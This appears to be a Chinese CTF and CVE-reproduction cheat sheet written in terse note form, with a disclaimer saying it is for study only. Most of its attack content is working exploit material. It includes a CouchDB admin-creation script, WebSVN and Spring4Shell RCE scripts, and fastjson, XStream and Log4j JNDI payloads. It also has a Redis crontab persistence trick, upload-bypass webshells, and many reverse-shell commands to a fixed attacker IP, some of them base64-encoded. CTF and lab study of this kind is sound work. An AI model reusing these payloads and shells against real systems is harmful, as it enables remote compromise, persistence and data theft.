免责声明:本文仅用于学习和研究目的,不鼓励或支持任何非法活动。所有技术内容仅供个人技术提升使用,未经授权不得用于攻击、侵犯或破坏他人系统。我们不对因使用本文内容而引起的任何法律责任或损失承担责任。
注:此文章为快速通关,方法不全,细节等还需自己多看文献·详解。
GPT 需要请看文章末.
综合起来,题目比较简单,多cve复现。感谢@A.M.~对本文的大力付出。
目录
资料:
seacms:
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721_cnvd-2020-22721-CSDN博客
真题模拟
1php代审
MS08067喊你来找Flag了
your key:
<title>CheckMe-01</title>
<?php
print("<h1>MS08067喊你来找Flag了</h1>");
?>
<form action="index.php" method="POST">
your key: <input type="text" name="key" />
<input type="submit" value="Submit" />
</form>
<?php
if(!empty($_POST['key'])){
$keys = $_POST['key'];
show_source("index.php");
$keys = base64_decode(urldecode($keys));
if(strlen($keys)==6){
if($keys=="ctfctf"){
print("<p>You win!</p>");
include("flag.php");
print($flag);
}
}
else{
print("末心:大漏特漏!此乃九年义务教育漏网之鱼。");
}
}
?>Y3RmY3Rm
2路径穿越
欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。
flag{6de32f81-5388-4baa-a7a3-01f1d0d4ece0} <?php include($_GET['url']);?>
3日志包含
<?php include($_GET['text']);?>
包含日志---webshell
env
set
4md5弱比较
<?php $flag="";
$a=$_GET["a"];
$b=$_GET["b"];
if(isset($a) && isset($b)){
if(!ctype_alpha($a)){
die("a error");
}
if(!is_numeric($b)){
die("b error");
}
if(md5($a)==md5($b)){
echo $flag;
}
}else{
echo "请问,flag在哪里?";
}?>md5弱比较
总结ctf中 MD5 绕过的一些思路_ctf md5绕过-CSDN博客
a为字母
b为数字
5md5强类型
md5强类型绕过
<?php
$a=$_GET["a"];
$b=$_GET["b"];
if($a!==$b && md5($a)===md5($b)){
echo($flag);
}
?>a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
6登录框-密码爆破
admin
密码:xxxxxxxxx(全数字)
密码爆破就完了,
7登录框-万能密码
万能密码
admin'#
密码随便输
8登录框-sql注入
sqlmap post time-blind
文件上传场景
来源国光文件上传靶场
1-13
国光文件上传靶场 WriteUp | lololowe的博客
upload1--前端js
过前端js检测就
function checkfilesuffix()
{
var file=document.getElementsByName('file')[0]['value'];
if(file==""||file==null)
{
swal("请添加上传文件", "", "error");
return false;
}
else
{
var whitelist=new Array(".jpg",".png",".gif",".jpeg");
var file_suffix=file.substring(file.lastIndexOf("."));
if(whitelist.indexOf(file_suffix) == -1)
{
swal("只允许上传图片类型的文件!", "", "error");
return false;
}
}
}
function error(){
swal("上传失败", "", "error");
}
禁用js,上传php/上传jpg后缀,抓包,改jpg为php,过前端验证即可。
2-.htaccess绕过
题目:黑名单
.htaccess文件是Apache服务器特有的配置文件,默认启用,用于配置Apache服务器,具体用法可以参看此文章:https://xz.aliyun.com/t/8267?time__1311=n4%2BxnD0Dc7exyDjxYqGNWP4IrVnuYA5GCzReD
其中我们可以利用到的.htaccess文件指令是AddHandler(SetHandler指令也可利用,但稍微长一些,具体用法参看刚提到的文章),可以将特定的文件格式与特定的MIME类型进行绑定,例如将.jpg文件与application/x-httpd-php进行绑定,这样Apache服务器在解析.jpg文件时,就会将其当作php文件进行解析。
上传 .htaccess
# 将 .phps .php3p .png .jpg .gif 当做 PHP 文件解析
AddType application/x-httpd-php .phps .php3p .png .jpg .gif
再上传shell.jpg 等等即可 解析为php
3-MIME校验(后端)
image/jpeg
image/png
image/gif
image/jpg
上传shell.php文件,bp抓包将MIME类型由application/octet-stream改为image/jpeg,即可成功上传:
/上传shell.jpg == image/jpg ,改后缀为 php 4-文件头+MIME
MIME类型:
image/jpeg
image/jpg
image/png
image/gif
文件头及对应的文件格式:
89504E47 -- .png
FFD8FFE0 -- .jpg
47494638 -- .gifcopy pic.png/b + shell.php/a shell.png
图片马
5-文件名删除
shell.php --- > shell.
shell.phphpp --> shell.php
6-文件名替换
shell.pphphp ---> shell.p hp
shell.PHP
xxxxxxxxxxxxxxxxxxxxxxxxx
7-%00截断
8-空字符截断
%00 再url-de
9-黑名单绕过
shell.php5
10-条件竞争
payload
<?php fputs(fopen('shell.php','w'),'<?php eval($_REQUEST[1]);?>');?>
<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>
# coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutor
def td(list):
url = 'http://110.42.47.105:17373'
file = {'upload_file': (
'szm.php', "<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[1]);?>'); ?>")}
data = {'submit': 'Upload'}
r = requests.post(url=url, data=data, files=file)
re = requests.get('http://110.42.47.105:17373/upload/shell.php')
if re.status_code == 200:
print('上传成功')
if __name__ == '__main__':
with ThreadPoolExecutor(20) as p:
p.map(td, range(200000))
xxxxxxxxxxxxxxxxxxxxxxxx
11-二次渲染
http://110.42.47.105:17953/?file=./upload/1946210678.gif
gif
12-/.绕过后缀检测
13-数组绕过
copy 1.jpg/b+2.php 3.jpg
本题主要考察代码审计,涉及到MIME验证+白名单+上传路径可控
源码如下
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
//检查MIME
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
//检查文件名
$file = empty($_POST['save_name']) ?
$_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}
例如上传upload.php.jpg
就会返回数组
array(3){
[0]=>upload,
[1]=>php,
[2]=>jpg
} –> 判断数组最后一个元素是否在白名单中
因此,可利用数组构造最后一个元素为白名单内的后缀('jpg','png','gif')
VIP
2014-4210 (weblogic 弱口令 加 上传)
Weblogic漏洞复现之SSRF(CVE-2014-4210) flag在环境变量
Weblogic SSRF漏洞(CVE-2014-4210)漏洞复现 - 哔哩哔哩
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.1:6379
weblogic
ssrf ????? bot ! 内网ip我是真不知道。
弱口令+webshell:
弱口令 weblogic Oracle@123
大体上传流程: 渗透测试-Weblogic后台部署War大马_创建war大马-CSDN博客
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload
上传成功,访问 /21/21.jsp 连马子即可。
junams
junams 文件上传 (CNVD-2020-24741)复现-CSDN博客
drupal
Drupal 远程代码执行漏洞(CVE-2019-6339)简单复现 - Mke2fs - 博客园
Drupal 远程代码执行漏洞(CVE-2019-6339)
goby 秒了
yapi
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。
软件 ,接口 ,rce
2018-1273
goby 秒了
描述:Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。
CouchDB
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
EXP:
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth
target = 'http://your-ip:5984'
command = rb"""sh -i >& /dev/tcp/10.0.0.1/443 0>&1"""
version = 1
session = requests.session()
session.headers = {
'Content-Type': 'application/json'
}
# session.proxies = {
# 'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
"type": "user",
"name": "wooyun",
"roles": ["_admin"],
"roles": [],
"password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
host = session.get(target + '/_membership').json()['all_nodes'][0]
session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
if version == 1:
session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')
Websvn
Websvn是一个应用软件。一个在线Subversion存储库浏览器,WebSVN 2.6.1之前版本存在安全漏洞,其search.php?search= 参数下过滤不严谨导致RCE
EXP:
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request send. Did you get what you wanted?")Nostromo
脚本地址:GitHub - jas502n/CVE-2019-16278: Directory transversal to remote code execution
./CVE-2019-16278.sh IP地址 端口号 id
xxl-job
xxl-job远程命令执行漏洞复现_xxljob漏洞-CSDN博客
POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "echo 'bash -i >& /dev/tcp/39.105.154.133/9090 0>&1' > /tmp/1.sh",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "chmod +x /tmp/1.sh",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=pqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace=0|0; PHPSESSID=j49mvsid608froa0gcftn8euoe; login_auto=YXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num=0; eth0_time=1737625442; eth0=566.285; _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Content-Type: application/x-www-form-urlencoded
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "/bin/bash /tmp/1.sh",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
监听,---上线。jmeter
Jmeter RMI 反序列化命令执行漏洞
工具:
https://github.com/Y4er/ysoserial
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 'touch /tmp/success'
反弹shell:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}"
fastjson
创建恶意类 (带反弹shell)
javac ----> .class
启动http
用工具启动rmi,监听9999端口
发包,反弹shell,拿下。
curl http://27.25.151.24:28493/ -H "Content-Type: application/json" --data '{"name":"karsa", "age":22}'
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/39.105.154.133/6666 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://39.105.154.133:1337/#TouchFile" 9999
POC:
POST / HTTP/1.1
Host: 27.25.151.24:26795
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://39.105.154.133:9999/TouchFile",
"autoCommit":true
}
}
xstream ???
CVE-2021-29505 XStream远程代码执行漏洞复现
CVE-2021-21351:XStream反序列化远程代码执行漏洞简析
Xstream反序列化漏洞复现 - Arrest - 博客园
/bin/bash -i>& /dev/tcp/39.105.154.133/9090 0>&1
L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvOTA5MCAwPiYx
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
POST / HTTP/1.1
Host: 192.168.50.129:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1675
<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>39.105.154.133</string> <int>4444</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>39.105.154.133</host> <port>4444</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>
POST / HTTP/1.1
Host: 27.25.151.24:27172
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid=14
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Referer: http://attck.ms08067.com/
Content-Type: application/xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>39.105.154.133</string>
<int>6666</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>39.105.154.133</host>
<port>6666</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -i >& /dev/tcp/39.105.154.133/9090 0>&1 2>&1" -A 39.105.154.133
bash -i >& /dev/tcp/39.105.154.133/8888 0>&1 2>&1
rmi://39.105.154.133:1099/jskfvr
java 1.8 8 11 17
log4j2 ????
https://github.com/welk1 n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "想要执行的命令" -A "攻击机 的ip"
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx} |{base64,-d} | {bash,-i}" -A "攻击机ip"
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy8xMDAwMSAwPiYx} |{base64,-d} | {bash,-i}" -A "39.105.154.133"
${jdni:rmi://39.105.154.133:1099/vacwrg}
==================================
使用JNDI-Injection-Exploit.jar工具生成反弹shell :(反弹语句:bash -i >& /dev/tcp/xx..xx.88/10001 0>&1)
场景靶场
镜像站
ssrf
CTFHub之Web篇之Web实战之SSRF(更新中~~) - AcWing
file协议读取即可
CodeExec
目录扫描
扫出 [12:08:43] 200 - 199B - /shell.php
访问 get cmd 执行命令
?cmd=set
接口功能
ping
Redis ????
未授权
// 设置key
set xxx "\n\n* * * * * bash -i>& /dev/tcp/39.105.154.133/9090 0>&1\n\n"
//添加名为xxx的key,值为后面反弹shell的语句,5个星号代表每分钟执行一次,其中的\n同样是为了换行,避免crontab的语法错误。这里你也可以去不加\n,去看看乱码,踩个坑才能印象深刻
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save
然后等待成功就行了
flag{7b992efb5ab23a3a3d5100e366c48423}
flag{7b992efb5ab23a3a3d5100e366c48423}
http://101.43.64.97:36291/
redis-cli -h 101.43.64.97 -p 36291
// 设置key
set xxx "\n\n* * * * * bash -i>& /dev/tcp/39.105.154.133/2333 0>&1\n\n"
//添加名为xxx的key,值为后面反弹shell的语句,5个星号代表每分钟执行一次,其中的\n同样是为了换行,避免crontab的语法错误。这里你也可以去不加\n,去看看乱码,踩个坑才能印象深刻
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save
然后等待成功就行了
redis你猜
文件包含
/etc/redis.conf
PUT
Tomcat任意写入文件漏洞(CVE-2017-12615)
抓首页包,改包,改请求方式:
PUT /1.jsp/ HTTP/1.1
Host: 101.43.64.97:37944
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
马子。rce
<%
java.io.InputStream is = Runtime.getRuntime()
.exec(request.getParameter("cmd"))
.getInputStream();
int a = -1;
byte[] b = new byte[2048];
while ((a = is.read(b)) != -1) {
out.print(new String(b));
}
%>
xxxx?cmd=env
XXE
登录框,
挺难的! ???
mysql
WEB
52
cve-2017-5638
struts2-045 远程代码执行漏洞(CVE-2017-5638)
随便上传一个文件
url复制过来,直接检测
redis-Lua
春秋云境:CVE-2022-0543(Redis 沙盒逃逸漏洞)-CSDN博客
redis-cli -h xxx -p xxx
payload:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("env", "r"); local res = f:read("*a"); f:close(); return res' 0flink
文件上传 jsp
.jar
goby 利用。
weblogic
rce
goby秒了
SpringFramework
Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。
#!/usr/bin/env python3
#coding:utf-8
import requests
import argparse
from urllib.parse import urljoin
def Exploit(url):
headers = {"suffix":"%>//",
"c1":"Runtime",
"c2":"<%",
"DNT":"1",
"Content-Type":"application/x-www-form-urlencoded"
}
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
shellurl = urljoin(url, 'tomcatwar.jsp')
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
if shellgo.status_code == 200:
print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
except Exception as e:
print(e)
pass
def main():
parser = argparse.ArgumentParser(description='Srping-Core Rce.')
parser.add_argument('--file',help='url file',required=False)
parser.add_argument('--url',help='target url',required=False)
args = parser.parse_args()
if args.url:
Exploit(args.url)
if args.file:
with open (args.file) as f:
for i in f.readlines():
i = i.strip()
Exploit(i)
if __name__ == '__main__':
main()
L4 ???
java 版本问题???????!!!!!!!!!!!!!!! vps自身防御问题。
log4j2-rce-cve-2021-44228 漏洞复现_log4j2 复现 vps 开放端口-CSDN博客
i6bfpg.dnslog.cn
/solr/admin/cores?action=${jndi:ldap://rcilyy.dnslog.cn}
${jndi:ldap://${sys:java.version}.rcilyy.dnslog.cn}
http://domain/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.u8gtb8.dnslog.cn}
${jndi:ldap://x❌x❌1389/Basic/Command/Base64/base64命令}
${jndi:ldap://39.105.154.133:1389/Basic/Command/Base64/bHM=}
poc:ldap://null:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supporte
